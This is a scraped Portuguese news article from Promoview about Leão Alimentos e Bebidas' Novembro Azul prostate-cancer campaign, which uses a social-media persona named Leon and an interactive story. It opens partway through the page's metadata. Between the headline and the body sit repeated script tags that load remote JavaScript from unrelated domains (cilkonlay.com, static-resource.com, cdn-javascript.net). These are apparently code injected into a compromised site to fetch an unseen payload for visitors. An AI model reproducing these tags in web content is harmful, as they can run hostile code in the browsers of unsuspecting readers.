\n\n\n\n\n\n\n\n","alternativeHeadline":"Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.\n\n\n\n\n\n\n\n\n\n","abstract":"Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.\n\n\n\n\n\n\n\n\n\n","articleBody":"Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.\r\n\r\nSegundo dados do Inca, no Brasil, o câncer de próstata é o segundo mais comum entre os homens, atrás apenas do câncer de pele não melanoma. Só no ano de 2018, estima-se que surgiram 68.220 novos casos da doença.\r\n\r\nConfira as últimas novidades sobre marketing digital aqui.\r\n\r\nLeia também: Leão leva chá para infusão em água gelada à Mercosuper.\r\n\r\nCiente da importância do diagnóstico precoce e preocupada com a saúde de seus colaboradores, a Leão Alimentos e Bebida aderiu ao Novembro Azul e promoverá uma série de ações durante todo o mês, criando, inclusive, uma persona para falar diretamente com o público pelas redes sociais.\r\n\r\n"O Leon será o rosto da Leão durante esse mês. Ele é recém-formado em engenharia de produção, tem 25 anos e mora em São Paulo. Descolado, adora acompanhar as novidades dos seus amigos nas redes sociais. Por ser superantenado, é ele quem dialogará com o público em geral, contando histórias para conscientizar a respeito do câncer de próstata. Fora isso, ele dará dicas e informações sobre o assunto.", explica Ana Paula Seixas, Institucional e Comunicação da Leão Alimentos e Bebidas.\r\n\r\n\r\n\r\nAlém da criação desse personagem, a empresa fará uma campanha interativa nas redes: será criada uma história com alguns finais possíveis. A cada semana um pedaço da trama será divulgado no Facebook e no Instagram e o público poderá escolher quais caminhos o personagem seguirá.\r\n\r\nDe acordo com as escolhas, cada pessoa terá seu final. "A ideia é justamente sensibilizar o público, mostrar que pequenas escolhas podem mudar nossa vida. Decidimos criar atividades interativas justamente para envolver e falar de forma direta sobre um assunto que é tão importante.", finaliza Ana Paula.\r\n\r\nVale ressaltar que a Leão também promoverá ações com seus colaboradores, convidando-os a conhecer mais sobre o tema e divulgando materiais internos.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Mídia"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/","url":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/","name":"Leão cria persona para alertar sobre o câncer de próstata - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/8cd268dd.jpg","datePublished":"2019-11-07T06:55:00+00:00","dateModified":"2025-04-25T04:19:31+00:00","description":"Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.","breadcrumb":{"@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/8cd268dd.jpg","contentUrl":"https://uploads.promoview.com.br/2023/12/8cd268dd.jpg","width":717,"height":599},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/leao-cria-persona-para-alertar-sobre-o-cancer-de-prostata/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Mídia","item":"https://www.promoview.com.br/experiencia-de-marca/midia/"},{"@type":"ListItem","position":4,"name":"Leão cria persona para alertar sobre o câncer de próstata"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}
Leão cria persona para alertar sobre o câncer de próstata
Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573086758153" type="text/javascript"></script><script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script>
<script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script>
<script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573087037161" type="text/javascript"></script>
<script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
Empresa também fará campanha interativa na internet, convidando o público a decidir o final de uma história contada durante todo o mês.
Segundo dados do Inca, no Brasil, o câncer de próstata é o segundo mais comum entre os homens, atrás apenas do câncer de pele não melanoma. Só no ano de 2018, estima-se que surgiram 68.220 novos casos da doença.
Confira as últimas novidades sobre marketing digital aqui.
Ciente da importância do diagnóstico precoce e preocupada com a saúde de seus colaboradores, a Leão Alimentos e Bebida aderiu ao Novembro Azul e promoverá uma série de ações durante todo o mês, criando, inclusive, uma persona para falar diretamente com o público pelas redes sociais.
"O Leon será o rosto da Leão durante esse mês. Ele é recém-formado em engenharia de produção, tem 25 anos e mora em São Paulo. Descolado, adora acompanhar as novidades dos seus amigos nas redes sociais. Por ser superantenado, é ele quem dialogará com o público em geral, contando histórias para conscientizar a respeito do câncer de próstata. Fora isso, ele dará dicas e informações sobre o assunto.", explica Ana Paula Seixas, Institucional e Comunicação da Leão Alimentos e Bebidas.
Além da criação desse personagem, a empresa fará uma campanha interativa nas redes: será criada uma história com alguns finais possíveis. A cada semana um pedaço da trama será divulgado no Facebook e no Instagram e o público poderá escolher quais caminhos o personagem seguirá.
De acordo com as escolhas, cada pessoa terá seu final. "A ideia é justamente sensibilizar o público, mostrar que pequenas escolhas podem mudar nossa vida. Decidimos criar atividades interativas justamente para envolver e falar de forma direta sobre um assunto que é tão importante.", finaliza Ana Paula.
Vale ressaltar que a Leão também promoverá ações com seus colaboradores, convidando-os a conhecer mais sobre o tema e divulgando materiais internos.
Nós usamos cookies e outras tecnologias semelhantes para melhorar a sua experiência em nossos serviços, personalizar publicidade e recomendar conteúdo de seu interesse. Ao utilizar nossos serviços, você está ciente dessa funcionalidade.
Termos de Uso
e
Política de privacidade